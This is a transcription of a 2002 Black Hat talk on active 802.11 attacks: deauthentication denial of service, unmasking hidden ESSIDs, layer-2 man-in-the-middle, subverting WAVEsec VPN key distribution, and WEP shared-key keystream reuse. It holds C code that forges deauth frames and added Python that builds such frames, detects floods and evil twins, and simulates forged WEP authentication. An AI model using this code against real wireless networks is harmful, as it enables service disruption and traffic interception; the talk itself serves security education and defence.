Advanced 802.11 Attack


7/31/2002 Black Hat 2002, Las Vegas NV

Advanced 802.11 Attack

Mike Lynn & Robert Baird


    What Is NOT Covered

Wired Equivalent Privacy (WEP) vulnerabilities

WEP key cracking techniques

Radio signal amplification

Suggested changes to the IEEE 802.11b specification

Wireless network discovery tools


    What Will Be Covered

    Wireless network best practices

    Practical attacks

The focus of the attack(s)
  The network layers: the bottom 2 layers
  Custom (forged) 802.11b management frames

The Tool Box
  Drivers
  Utilities
  Proof of concept code


    What Will Be Covered

Attack Scenarios
  Denial of service
  Masked ESSID detection
  802.11b layer MITM attack
  Inadequate VPN implementations

    Mitigation Strategies


    Wireless Best Practices

Enable WEP (Wired Equivalent Privacy)
  Key rotation when equipment supports it

Disable broadcast of ESSID

Block null ESSID connection

    Restrict access by MAC address

    Use VPN technology

    Use strong mutual authentication


Practical Attacks

WEP: can be cracked passively

Masked ESSID: can be passively observed in management frames during association

Block null ESSID connects: same problem

Install VPN: a weakly authenticated VPN is susceptible to active attack (MITM)

    Strong mutual authentication - ?


    The Bottom Layers

Manipulating the bottom 2 layers of the OSI model

Data Link (Layer 2)
  Media Access Control (MAC): access to the medium
  Logical Link Control (LLC): frame sync, flow control

Physical (Layer 1)
  Radio bit stream
  Divided into channels



    Management Frames

Management frames can control link characteristics and physical medium properties

802.11b management frames are NOT authenticated

    Why is this bad?


The Tool Box

Custom Drivers
  Air-Jack: custom driver for PrismII (HFA384x) cards
    MAC address setting/spoofing
    Send custom (forged) management frames
    AP forgery/fake AP
  Lucent/Orinoco Linux driver modified to allow MAC address setting/spoofing from the command line

Utilities
  User space programs: wlan-jack, essid-jack, monkey-jack, kracker-jack


Air-Jack Driver

Allows control of wireless card modes
  Modes 0 and 1: standard documented modes
    IBSS (0) (ad-hoc) or BSS (1) (infrastructure)
  Pseudo-IBSS (3) mode
    Control channel selection
    Firmware handles timing-sensitive functions
  Mode 5 (undocumented)
    Channel selection
    Firmware handles time-sensitive functions
    No beacons sent
    Very little firmware intervention


Air-Jack Driver

Mode 6: Host Access Point mode
  Sends beacons (firmware control)
  Responds to probe requests
  Handles time-sensitive functions

Can enable PrismII monitor mode

Uses the Linux PF_PACKET interface for RX and TX of raw frames


Air-Jack Driver

Forging a deauthentication frame with the Air-Jack driver (`struct a3_80211` and the `FC_TYPE_MGT`/`MGT_DEAUTH` constants are the driver's own definitions; `aj_sock` is the PF_PACKET socket bound to the Air-Jack interface):

```c
#include <linux/types.h>   /* __u8, __u16 */
#include <string.h>
#include <sys/socket.h>
#include <endian.h>
#include "airjack.h"       /* Air-Jack's struct a3_80211, FC_TYPE_MGT and MGT_DEAUTH (header name assumed) */

/* The slide named this global `socket`, which collides with the libc socket() declaration. */
extern int aj_sock;        /* PF_PACKET socket bound to the Air-Jack interface */

void send_deauth(__u8 *dst, __u8 *bssid)
{
    struct {
        struct a3_80211 hdr;   /* 3-address 802.11 header */
        __u16 reason;          /* deauthentication reason code, little-endian on the air */
    } __attribute__((packed)) frame;

    memset(&frame, 0, sizeof(frame));
    frame.hdr.mh_type = FC_TYPE_MGT;
    frame.hdr.mh_subtype = MGT_DEAUTH;
    memcpy(&(frame.hdr.mh_mac1), dst, 6);     /* addr1: victim, or ff:ff:ff:ff:ff:ff for everyone */
    memcpy(&(frame.hdr.mh_mac2), bssid, 6);   /* addr2: forged source, the AP's MAC */
    memcpy(&(frame.hdr.mh_mac3), bssid, 6);   /* addr3: BSSID */
    frame.reason = htole16(1);                /* reason code 1: unspecified */
    send(aj_sock, &frame, sizeof(frame), 0);
}
```


    Attack Scenarios WLAN-Jack

Denial of Service: de-authentication
  Use the MAC address of the access point as the source
  Send deauthenticate frames
  Send continuously
  Send to the broadcast address or to a specific MAC
  Users are unable to reassociate with the AP

Air-Jack + WLAN-Jack
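The frame WLAN-Jack sends, built and decoded in Python as an added example (this is not code from the slides or from the Air-Jack tool set). MAC addresses, timestamps and the flood threshold are constructed for the demo; the sliding-window counter is the check a wireless IDS runs over captured management frames, which the slides list later under mitigation. Nothing is transmitted, the frames are in-memory byte strings.

```python
import struct

FC_TYPE_MGT = 0           # 802.11 frame type: management
MGT_DEAUTH = 0x0C         # management subtype: deauthentication
MGT_DISASSOC = 0x0A       # management subtype: disassociation (same reason-code body)
BROADCAST = b"\xff" * 6


def mac(text):
    """'00:11:22:33:44:55' -> 6 raw bytes."""
    return bytes.fromhex(text.replace(":", ""))


def build_deauth(dst, bssid, reason=1, seq=0):
    """Forge a deauth frame the way WLAN-Jack does: addr1 = victim (or broadcast),
    addr2 = addr3 = the AP's MAC, so the victim believes its own AP sent it."""
    fc = bytes([(MGT_DEAUTH << 4) | (FC_TYPE_MGT << 2), 0x00])   # version 0, no flags
    duration = struct.pack("<H", 0)
    seq_ctl = struct.pack("<H", (seq & 0xFFF) << 4)                # 12-bit seq, fragment 0
    return fc + duration + dst + bssid + bssid + seq_ctl + struct.pack("<H", reason)


def decode_mgmt(frame):
    """Decode the 24-byte management header; for deauth/disassoc also the reason code."""
    if len(frame) < 24:
        raise ValueError("truncated 802.11 header")
    fc0 = frame[0]
    hdr = {
        "type": (fc0 >> 2) & 0x3,
        "subtype": fc0 >> 4,
        "addr1": frame[4:10],
        "addr2": frame[10:16],
        "addr3": frame[16:22],
        "seq": struct.unpack("<H", frame[22:24])[0] >> 4,
    }
    if hdr["type"] == FC_TYPE_MGT and hdr["subtype"] in (MGT_DEAUTH, MGT_DISASSOC):
        hdr["reason"] = struct.unpack("<H", frame[24:26])[0]
    return hdr


def deauth_flood_sources(captures, window=1.0, threshold=10):
    """captures: iterable of (timestamp_seconds, frame_bytes).  Returns {addr2: peak}
    for every source that sent more than `threshold` deauthentication frames inside
    any `window`-second span (sliding window over the sorted timestamps)."""
    times = {}
    for ts, frame in captures:
        h = decode_mgmt(frame)
        if h["type"] == FC_TYPE_MGT and h["subtype"] == MGT_DEAUTH:
            times.setdefault(h["addr2"], []).append(ts)
    flagged = {}
    for src, stamps in times.items():
        stamps.sort()
        start, peak = 0, 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[src] = peak
    return flagged


# Constructed addresses for the demo (made up, not from the slides).
AP = mac("00:02:2d:aa:bb:cc")
OTHER_AP = mac("00:02:2d:dd:ee:ff")
CLIENT = mac("00:0c:41:11:22:33")


def demo_flood():
    """50 broadcast deauths spoofed from AP in half a second (the WLAN-Jack pattern)
    next to three genuine, widely spaced deauths from OTHER_AP."""
    flood = [(i * 0.01, build_deauth(BROADCAST, AP, reason=1, seq=i)) for i in range(50)]
    benign = [(100 + i * 5.0, build_deauth(CLIENT, OTHER_AP, reason=3, seq=i)) for i in range(3)]
    return deauth_flood_sources(flood + benign)


if __name__ == "__main__":
    print(decode_mgmt(build_deauth(CLIENT, AP)))
    print(demo_flood())
```

Run stand-alone it prints the decoded header and `{AP: 50}`; the three spaced deauths from the second AP never cross the threshold. Because addr2 is whatever the sender writes, the detector can only attribute the flood to the MAC the attacker chose to spoof, i.e. the real AP: the signal is the rate, not the source address.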

Attack Scenarios WLAN-Jack (screenshots)

Airopeek trace of the deauthentication flood

Decode of deauthentication frame

This is your connection

This is your connection on WLAN-Jack.


    Attack Scenarios ESSID-Jack

    Is the ESSID a shared secret?

If I mask the ESSID from the AP beacons, will unauthorized users be unable to associate with my AP?

Discover masked ESSID
  Send a deauthenticate frame to the broadcast address
  Obtain the ESSID contained in the client probe request or the AP probe response

Attack Scenarios ESSID-Jack (screenshots)

Airopeek trace


    Attack Scenarios Monkey-Jack

MITM attack: taking over connections at layers 1 and 2
  Insert the attack machine between the victim and the access point

Management frames: deauthenticate the victim from the real AP
  Send deauthenticate frames to the victim using the access point's MAC address as the source


    Attack Scenarios Monkey-Jack

Victim's 802.11 card scans channels to search for a new AP

Victim's 802.11 card associates with the fake AP on the attack machine
  Fake AP is on a different channel than the real one
  Attack machine's fake AP duplicates the MAC address and ESSID of the real AP


    Attack Scenarios Monkey-Jack

Attack machine associates with the real AP
  Attack machine duplicates the MAC address of the victim's machine

Attack machine is now inserted and can pass frames through in a manner that is transparent to the upper-level protocols

Attack Scenarios Monkey-Jack (diagrams)

Before Monkey-Jack

After Monkey-Jack
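One parser serving both the ESSID-Jack and the Monkey-Jack sections, as an added example that is not taken from the slides or the tools: it splits management frame bodies into information elements, recovers a masked ESSID from the probe response or association request that follows a deauthentication, and flags a BSSID that beacons on two channels, which is what the Monkey-Jack fake AP looks like from a monitor-mode card. The capture, MAC addresses and SSID are constructed; the DS Parameter Set cross-check is an addition beyond what the slides describe.

```python
import struct

MGT_ASSOC_REQ, MGT_PROBE_REQ, MGT_PROBE_RESP, MGT_BEACON = 0x0, 0x4, 0x5, 0x8
IE_SSID, IE_DS_PARAM = 0, 3          # information element tags
BROADCAST = b"\xff" * 6
# Fixed fields that precede the IEs in each subtype parsed here:
#   beacon / probe response: timestamp(8) + beacon interval(2) + capability(2)
#   association request:     capability(2) + listen interval(2);  probe request: none
FIXED_LEN = {MGT_BEACON: 12, MGT_PROBE_RESP: 12, MGT_ASSOC_REQ: 4, MGT_PROBE_REQ: 0}


def mac(text):
    return bytes.fromhex(text.replace(":", ""))


def mgmt_header(subtype, addr1, addr2, addr3, seq=0):
    """24-byte management header: frame control, duration, addr1..3, sequence control."""
    return bytes([subtype << 4, 0]) + b"\x00\x00" + addr1 + addr2 + addr3 + struct.pack("<H", seq << 4)


def ie(tag, value):
    return bytes([tag, len(value)]) + value


def parse_ies(body):
    """Tag/length/value elements; a truncated trailing element is dropped, never read past."""
    out, i = [], 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        if i + 2 + length > len(body):
            break
        out.append((tag, body[i + 2:i + 2 + length]))
        i += 2 + length
    return out


def mgmt_fields(frame):
    """-> (subtype, addr1, addr2, addr3, ies); IEs are empty for subtypes not handled here."""
    subtype = frame[0] >> 4
    ies = parse_ies(frame[24 + FIXED_LEN[subtype]:]) if subtype in FIXED_LEN else []
    return subtype, frame[4:10], frame[10:16], frame[16:22], ies


def ssid_of(ies):
    """SSID as text, or None when the IE is absent or masked (zero length or all NULs)."""
    for tag, val in ies:
        if tag == IE_SSID:
            return None if val.strip(b"\x00") == b"" else val.decode("utf-8", "replace")
    return None


def recover_masked_essids(frames):
    """ESSID-Jack: BSSIDs whose beacons mask the SSID, mapped to the name revealed by the
    AP's probe response or by a client's BSSID-directed probe / association request.
    (A probe request with a wildcard BSSID reveals the name but not which AP it belongs to.)"""
    masked, revealed = set(), {}
    for frame in frames:
        subtype, a1, a2, a3, ies = mgmt_fields(frame)
        name = ssid_of(ies)
        if subtype == MGT_BEACON and name is None:
            masked.add(a3)
        elif name and subtype in (MGT_PROBE_RESP, MGT_PROBE_REQ, MGT_ASSOC_REQ) and a3 != BROADCAST:
            revealed[a3] = name       # addr3 is the BSSID in all three subtypes
    return {b: revealed[b] for b in masked if b in revealed}


def evil_twin_bssids(captures):
    """Monkey-Jack: captures = (rx_channel, frame).  A BSSID heard beaconing on more than one
    channel, or whose DS Parameter Set disagrees with the channel it was heard on, is being
    cloned by a fake AP on another channel."""
    seen = {}
    for rx_chan, frame in captures:
        subtype, a1, a2, a3, ies = mgmt_fields(frame)
        if subtype != MGT_BEACON:
            continue
        chans = seen.setdefault(a3, set())
        chans.add(rx_chan)
        chans.update(v[0] for t, v in ies if t == IE_DS_PARAM and len(v) == 1)
    return {b: sorted(c) for b, c in seen.items() if len(c) > 1}


# Constructed capture (addresses and SSID made up): hidden-SSID AP on channel 6, the probe
# exchange a deauthenticated client performs, and a fake AP cloning the BSSID on channel 11.
AP = mac("00:02:2d:aa:bb:cc")
CLIENT = mac("00:0c:41:11:22:33")
BEACON_FIXED = bytes(8) + struct.pack("<HH", 100, 0x0411)    # timestamp, interval, capability


def beacon(bssid, ssid, channel):
    return (mgmt_header(MGT_BEACON, BROADCAST, bssid, bssid) + BEACON_FIXED
            + ie(IE_SSID, ssid) + ie(IE_DS_PARAM, bytes([channel])))


def sample_capture():
    return [
        (6, beacon(AP, b"", 6)),                                                    # masked SSID
        (6, mgmt_header(MGT_PROBE_REQ, BROADCAST, CLIENT, BROADCAST) + ie(IE_SSID, b"corp-wlan")),
        (6, mgmt_header(MGT_PROBE_RESP, CLIENT, AP, AP) + BEACON_FIXED
            + ie(IE_SSID, b"corp-wlan") + ie(IE_DS_PARAM, b"\x06")),
        (11, beacon(AP, b"corp-wlan", 11)),                                         # evil twin
    ]


if __name__ == "__main__":
    print(recover_masked_essids([f for _, f in sample_capture()]))
    print(evil_twin_bssids(sample_capture()))
```

The masked beacon alone yields nothing; the probe response that follows the deauth names the network, which is exactly why hiding the ESSID is not a secret. The evil-twin check needs a capture that hops channels (or several cards), since the fake AP deliberately sits where the real one is not.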


    Attack Scenarios Kracker-Jack

Dangers of wireless MITM
  Wireless networks are more vulnerable to MITM attacks than wired networks
  Many security solutions are implemented with an assumption of a secure layer 1 and 2
  Many VPN solutions are implemented with inadequate authentication for protection against wireless MITM attacks


    Attack Scenarios Kracker-Jack

WAVEsec: an open source software solution for securing wireless networks
  Uses the FreeS/WAN IPsec implementation
  Will thwart passive eavesdropping of wireless network communications
  Implementation options: X.509 certificates, Secure DNS


    Attack Scenarios Kracker-Jack

Authenticating with the WAVEsec gateway
  Client sends a modified DHCP request with the client's public key
  WAVEsec gateway inserts the client's public key into a DNS record
  Client obtains the WAVEsec gateway's public key by requesting it from the DNS server
  IPsec tunnel setup


    Attack Scenarios Kracker-Jack

Using Kracker-Jack
  KJ inserts at the 802.11 layer (like Monkey-Jack)
  KJ, using a DNS request, gets the victim's public key from the DNS server
  KJ, using the victim's MAC address, sends a DHCP request with its own key to replace the victim's key in the DNS server


    Attack Scenarios Kracker-Jack

  KJ initiates an ISAKMP main mode SA with the WAVEsec server
  KJ initiates an ISAKMP main mode SA with the victim
  Victim gets the new server key by a DNS request serviced by KJ
  Two separate IPsec tunnels are now set up; all traffic passes through KJ in the clear (decrypted out of one tunnel and re-encrypted into the other)

Attack Scenarios Kracker-Jack (diagram)


    Attack Scenarios Kracker-Jack

IKE: ISAKMP/Oakley Phase 1 (main mode)
  Messages 1 and 2 negotiate the characteristics of the security association; no authentication
  Messages 3 and 4 exchange random values (nonces) and execute a Diffie-Hellman exchange to establish a master key (SKEYID); no authentication
  Messages 5 and 6 exchange information for mutually authenticating the parties: identity payload, signature payload, and OPTIONAL certificate payload

The signature in messages 5 and 6 authenticates the peer only as strongly as the verifier's binding between identity and public key; with WAVEsec that binding comes from DNS, which Kracker-Jack has already rewritten.


    Attack Scenarios Kracker-Jack

IKE: ISAKMP/Oakley Phase 2 (Oakley Quick Mode)
  Define security associations
  Define the keys used to protect IP datagrams


    Attack Scenarios

Shared key authentication attack
  Observe the plaintext challenge
  Observe the ciphertext response
  XOR plaintext with ciphertext to get the key stream
  XOR an IP packet with the key stream, re-using the IV (e.g. a broadcast ping)
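The shared key authentication attack carried through in Python, as an added example not drawn from the slides: a toy WEP implementation (RC4 keyed with IV||secret, CRC-32 ICV) plays the AP and a legitimate client, the attacker recovers the keystream for one IV from the observed challenge/response, then answers a fresh challenge and encrypts a short frame under the same IV without ever holding the key. Key, IV, challenge and payload are constructed. The recovered keystream is only as long as the response it came from (140 bytes here) and only valid for that IV; the AP accepts it because WEP never checks for IV reuse.

```python
import os
import struct
import zlib


def rc4(key, n):
    """RC4 keystream of n bytes for `key` (WEP: 3-byte IV || secret key)."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):                         # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext):
    return struct.pack("<I", zlib.crc32(plaintext))       # WEP ICV: CRC-32, little-endian


def wep_encrypt(secret, iv, plaintext):
    """WEP body: IV(3) || key id(1) || RC4_{iv||secret}(plaintext || ICV)."""
    data = plaintext + icv(plaintext)
    return iv + b"\x00" + xor(data, rc4(iv + secret, len(data)))


def wep_decrypt(secret, body):
    """Return the plaintext, or None if the ICV does not verify."""
    iv, ct = body[:3], body[4:]
    data = xor(ct, rc4(iv + secret, len(ct)))
    pt = data[:-4]
    return pt if data[-4:] == icv(pt) else None


def challenge_ie(challenge):
    """Auth frame body encrypted in message 3: algorithm(2)=1, seq(2)=3, status(2)=0, challenge IE (tag 16)."""
    return struct.pack("<HHH", 1, 3, 0) + bytes([16, len(challenge)]) + challenge


class AccessPoint:
    def __init__(self, secret):
        self.secret = secret

    def challenge(self):
        return os.urandom(128)                 # 128-byte challenge text, sent in the clear

    def verify(self, challenge, encrypted_response):
        return wep_decrypt(self.secret, encrypted_response) == challenge_ie(challenge)


def legit_client_response(secret, challenge, iv=b"\x0a\x0b\x0c"):
    return wep_encrypt(secret, iv, challenge_ie(challenge))


def recover_keystream(challenge, encrypted_response):
    """Attacker: known plaintext (challenge IE plus its ICV, both computable) XOR ciphertext."""
    pt = challenge_ie(challenge)
    return encrypted_response[:3], xor(pt + icv(pt), encrypted_response[4:])


def forge_with_keystream(iv, keystream, plaintext):
    """Encrypt any frame of at most len(keystream)-4 bytes under the captured IV, no key needed."""
    data = plaintext + icv(plaintext)
    if len(data) > len(keystream):
        raise ValueError("keystream too short for this frame")
    return iv + b"\x00" + xor(data, keystream[:len(data)])


def run_attack(secret=b"\x01\x02\x03\x04\x05"):       # constructed 40-bit WEP key
    ap = AccessPoint(secret)
    # 1. the attacker watches one legitimate station authenticate
    c1 = ap.challenge()
    iv, ks = recover_keystream(c1, legit_client_response(secret, c1))
    # 2. the attacker answers a fresh challenge with the same IV and no key
    c2 = ap.challenge()
    forged = forge_with_keystream(iv, ks, challenge_ie(c2))
    # 3. the same keystream encrypts a short data payload (placeholder LLC/SNAP + IP bytes)
    ping = forge_with_keystream(iv, ks, b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + bytes(60))
    return {
        "keystream_len": len(ks),
        "forged_auth_accepted": ap.verify(c2, forged),
        "ping_decrypts": wep_decrypt(secret, ping) is not None,
    }


if __name__ == "__main__":
    print(run_attack())
```

Nothing here recovers the WEP key; the attacker only learns one IV's keystream. That is enough to pass shared-key authentication forever against this AP and to inject frames shorter than the captured response, which is why shared-key authentication is weaker than open authentication with WEP: it hands out 140 bytes of known-plaintext keystream to anyone listening.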


    Mitigation Strategies

    Big guy with a stick

Wireless IDS and monitoring (e.g. AirDefense, http://www.airdefense.net)

VPN + strong mutual authentication

RF signal shaping: avoiding signal leaks
  Antennas with a directional radiation pattern
  Lower access point power


    Summary

Wireless networks are more susceptible to active attacks than wired networks

Enable all built-in security capabilities

Use a VPN with strong mutual authentication

Monitor the wireless network medium (airspace) for suspicious activity

Updates: Black Hat web site or http://802.11ninja.net


Advanced 802.11 Attack

Robert Baird & Mike Lynn